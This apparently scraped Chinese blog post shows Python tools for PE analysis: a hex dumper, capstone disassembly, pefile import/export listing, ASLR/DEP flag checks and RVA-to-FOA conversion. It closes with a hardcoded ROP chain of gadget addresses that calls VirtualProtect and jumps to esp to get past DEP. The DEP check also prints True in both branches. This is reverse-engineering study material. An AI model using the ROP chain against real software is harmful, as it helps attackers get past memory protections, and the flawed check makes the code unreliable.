通过利用反汇编库,并使用python编写工具,读取PE结构中的基地址偏移地址,找到OEP并计算成FOA文件偏移,使用反汇编库对其进行反汇编,并从反汇编代码里查找事先准备好的ROP绕过代码,让其自动完成搜索,这里给出实现思路与部分代码片段。

十六进制转换器 可自行添加上,文件与偏移对应关系,即可实现指定位置的数据转换,这里给出坑爹版实现,自己晚膳吧。

#coding:utf-8

import os,sys

import binascii

# binascii.a2b_hex("4d")

if __name__ == "__main__":

    count = 0

    size = os.path.getsize("qq.exe")

    print("文件指针: {}".format(size))

    fp = open("qq.exe","rb")

    lis = []

    for item in range(500):

        char = fp.read(1)

        count = count + 1

        if count % 16 == 0:

            if ord(char) < 16:

                print("0" + hex(ord(char))[2:])

            else:

                print(hex(ord(char))[2:])

        else:

            if ord(char) < 16:

                print("0" + hex(ord(char))[2:] + " ",end="")

            else:

                print(hex(ord(char))[2:] + " ",end="")

二进制与字符串互转

import os

def to_ascii(h):

    list_s = []

    for i in range(0, len(h), 2):

        list_s.append(chr(int(h[i:i+2], 16)))

    return ''.join(list_s)

def to_hex(s):

    list_h = []

    for c in s:

        list_h.append(hex(ord(c))[2:])

    return ''.join(list_h)

with open("d://run.exe","rb") as fp:

    lis = []

    for x in range(10240):

        for i in range(64):

            char = fp.read(1)

            print(to_ascii(hex(ord(char))[2:]),end="")

        print("")

反汇编框架

import os

from capstone import *

CODE = b"\x55\x8b\xec\x6a\x00\xff\x15\x44\x30\x11\x00"

md = Cs(CS_ARCH_X86, CS_MODE_32)

for i in md.disasm(CODE, 0x1000):

    print("大小: %3s 地址: %-5s 指令: %-7s 操作数: %-10s"% (i.size,i.address,i.mnemonic,i.op_str))

print("*" * 100)

CODE64 = b"\x55\x48\x8b\x05\xb8\x13\x00\x00\xe9\xea\xbe\xad\xde\xff\x25\x23\x01\x00\x00\xe8\xdf\xbe\xad\xde\x74\xff"

md = Cs(CS_ARCH_X86, CS_MODE_64)

for i in md.disasm(CODE64, 0x1000):

    print("大小: %3s 地址: %-5s 指令: %-7s 操作数: %-10s"% (i.size,i.address,i.mnemonic,i.op_str))

读取pE结构的代码 读取导入导出表,用Python 实在太没意思了,请看C/C++ 实现PE解析工具笔记。

def ScanImport(filename):

    pe = pefile.PE(filename)

    print("-" * 100)

    try:

        for x in pe.DIRECTORY_ENTRY_IMPORT:

            for y in x.imports:

                print("[*] 模块名称: %-20s 导入函数: %-14s" %((x.dll).decode("utf-8"),(y.name).decode("utf-8")))

    except Exception:

        pass

    print("-" * 100)

def ScanExport(filename):

    pe = pefile.PE(filename)

    print("-" * 100)

    try:

        for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:

            print("[*] 导出序号: %-5s 模块地址: %-20s 模块名称: %-15s"

            %(exp.ordinal,hex(pe.OPTIONAL_HEADER.ImageBase + exp.address),(exp.name).decode("utf-8")))

    except:

        pass

    print("-" * 100)

验证DEP+ASLR

    # 随机基址 => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x40 == 0x40

    if( (pe.OPTIONAL_HEADER.DllCharacteristics & 64)==64 ):

        print("基址随机化: True")

    else:

        print("基址随机化: False")

    # 数据不可执行 DEP => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x100 == 0x100

    if( (pe.OPTIONAL_HEADER.DllCharacteristics & 256)==256 ):

        print("DEP保护状态: True")

    else:

        print("DEP保护状态: True")

    # 强制完整性=> hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x80 == 0x80

    if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 128)==128 ):

        print("强制完整性: True")

    else:

        print("强制完整性: False")

    if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 1024)==1024 ):

        print("SEH异常保护: False")

    else:

        print("SEH异常保护: True")

VA转FOA地址

import os

import pefile

def RVA_To_FOA(FilePath):

    pe = pefile.PE(FilePath)

    ImageBase = pe.OPTIONAL_HEADER.ImageBase

    for item in pe.sections:

        if str(item.Name.decode('UTF-8').strip(b'\x00'.decode())) == ".text":

            #print("虚拟地址: 0x%.8X 虚拟大小: 0x%.8X" %(item.VirtualAddress,item.Misc_VirtualSize))

            VirtualAddress = item.VirtualAddress

            VirtualSize = item.Misc_VirtualSize

            ActualOffset = item.PointerToRawData

    StartVA = hex(ImageBase + VirtualAddress)

    StopVA = hex(ImageBase + VirtualAddress + VirtualSize)

    print("[+] 代码段起始地址: {} 结束: {} 实际偏移:{} 长度: {}".format(StartVA,StopVA,ActualOffset,VirtualSize))

    with open(FilePath,"rb") as fp:

        fp.seek(ActualOffset)

        HexCode = fp.read(VirtualSize)

        print(HexCode)

RVA_To_FOA("d://lyshark.exe")

给出一条过保护的ROP链

rop = struct.pack ('<L',0x7c349614)   # ret

rop += struct.pack('<L',0x7c34728e)   # pop eax

rop += struct.pack('<L',0xfffffcdf)   #

rop += struct.pack('<L',0x7c379c10)   # add ebp,eax

rop += struct.pack('<L',0x7c34728e)   # pop eax

rop += struct.pack('<L',0xfffffdff)   # value = 0x201

rop += struct.pack('<L',0x7c353c73)   # neg eax

rop += struct.pack('<L',0x7c34373a)   # pop ebx

rop += struct.pack('<L',0xffffffff)   #

rop += struct.pack('<L',0x7c345255)   # inc ebx

rop += struct.pack('<L',0x7c352174)   # add ebx,eax

rop += struct.pack('<L',0x7c344efe)   # pop edx

rop += struct.pack('<L',0xffffffc0)   # 0x40h

rop += struct.pack('<L',0x7c351eb1)   # neg edx

rop += struct.pack('<L',0x7c36ba51)   # pop ecx

rop += struct.pack('<L',0x7c38f2f4)   # &writetable

rop += struct.pack('<L',0x7c34a490)   # pop edi

rop += struct.pack('<L',0x7c346c0b)   # ret (rop nop)

rop += struct.pack('<L',0x7c352dda)   # pop esi

rop += struct.pack('<L',0x7c3415a2)   # jmp [eax]

rop += struct.pack('<L',0x7c34d060)   # pop eax

rop += struct.pack('<L',0x7c37a151)   # ptr to virtualProtect()

rop += struct.pack('<L',0x625011ed)   # jmp esp

Python 实现进制转换与反汇编的更多相关文章

  1. python 实现进制转换(二进制转十进制)

    摘自https://baike.baidu.com/item/%E5%8D%81%E8%BF%9B%E5%88%B6%E8%BD%AC%E4%BA%8C%E8%BF%9B%E5%88%B6 pytho ...

  2. python任意进制转换

    python任意进制转换 import string def module_n_converter(q, s, base=None): """ 将自然数按照给定的字符串转 ...

  3. python实现进制转换(二、八、十六进制;十进制)

    python实现进制转换(二.八.十六进制:十进制) (一)十进制整数转为二.八.十六进制 1.format实现转换>>> format(2,"b") # (10 ...

  4. Python中进制转换函数的使用

    Python中进制转换函数的使用 关于Python中几个进制转换的函数使用方法,做一个简单的使用方法的介绍,我们常用的进制转换函数常用的就是int()(其他进制转换到十进制).bin()(十进制转换到 ...

  5. python中进制转换

    使用Python内置函数:bin().oct().int().hex()可实现进制转换. 先看Python官方文档中对这几个内置函数的描述: bin(x)Convert an integer numb ...

  6. Python 各种进制转换

    #coding=gbk var=input("请输入十六进制数:") b=bin(int(var,16)) print(b[2:]) 详细请参考python自带int函数.bin函 ...

  7. python 中进制转换及format(),int()函数用法

    python中数值型变量好像只能是十进制形式表示,其他类型变量只能以字符串形式存在,可以通过format函数将int类型变量转换成其他进制字符串,如下所示: v_code=15 # 2进制 x=for ...

  8. python的进制转换

    转载于:https://www.cnblogs.com/FWF1944/p/11132409.html(方法论190404) Python整数能够以十六进制,八进制和二进制来编写,作为一般以10位基数 ...

  9. python之进制转换

    Python中二进制是以0b开头的:    例如: 0b11 则表示十进制的3 8进制是以0开头的:    例如: 011则表示十进制的9 16进制是以0x开头的:    例如: 0x11则表示十进制 ...

  10. python的进制转换二进制,八进制,十六进制及其原理

    #!usr/bin/env python# coding:utf-8def binary(): '''二进制的方法与算法'''    Number = 10    Number1 = 20    Nu ...

随机推荐

  1. 容器卡在terminate状态无法删除

    1. pod卡在terminate状态无法删除.一般是lxcfx 卡住 或者 logcounter组件进程读容器数据盘分区导致的 2.  验证一下我们的猜测 cat /sys/fs/fuse/conn ...

  2. Codeforces Round #679 (Div. 2, based on Technocup 2021 Elimination Round 1) (个人题解)

    1434A. Finding Sasuke // Author : RioTian // Time : 20/10/25 #include <bits/stdc++.h> using na ...

  3. 更省更快,如何使用 Serverless 搭建个人专属网盘?

    作者| 西流 阿里云 Serverless 技术专家 1分钟 Serverless 部署个人网盘,赠好礼 随着全球大数据不断增长,未来数据云存储容量需求也将不断扩大,iiMedia Research( ...

  4. 2023是AI爆发的元年,程序员赚钱的机会来了,附49个机会!

    以下是程序员利用AI做代码生成的赚钱思路.方案,共49条,按照不同分类列出: 基于自然语言生成的机会: 1. 开发基于AI的自动生成代码软件,应用于网站开发.移动应用开发.家庭自动化.人工智能等各个领 ...

  5. 解决navicat连接mysql数据库查询很慢的问题

    1.背景: navicat连接数据库进行sql查询,每隔一段时间发现查询会变得很慢 2.原因: Mysql服务器端会定时清理长时间不活跃空闲的数据库连接,进行优化 3.解决方案: Navicat -右 ...

  6. Redis 主从复制架构配置及原理

    本文为博主原创,未经允许不得转载: 目录: 1. Redis 主从复制架构搭建 2. Redis 主从架构原理 3. Redis 断点续传 4. Jedis 连接 redis 主从架构一般配置一主多从 ...

  7. 第二届福州大学至诚学院网络安全大赛G0DCTF Misc WP

    MISC baby_misc 1.题目信息 key文件夹: 还有一张图片 2.解题方法 观察key文件夹里的每个文件信息,发现并无什么有用的,甚至有的为空... 看到文件名称的数字而且还给了图片,可以 ...

  8. [转帖]【oracle】oracle查询表存储大小和表空间大小

    目录 查看表分配的物理空间大小 查看表实际存储空间大小 查看每个表空间的大小 查看表空间大小及使用率 查看数据库中数据文件信息 查看临时表空间信息 oracle表大小有两种含义,即表分配的空间大小和实 ...

  9. [转帖]TiDB + TiFlash : 朝着真 HTAP 平台演进

    https://zhuanlan.zhihu.com/p/80495479 作者介绍:韦万,PingCAP 数据库研发工程师,主要领域是数据库的存储引擎研发,以及系统性能优化. 一.为什么我们需要 H ...

  10. [转帖]wmic命令介绍

    https://www.jianshu.com/p/3e1a5a8fa23b How to Get Your System Serial Number PS C:\windows\system32&g ...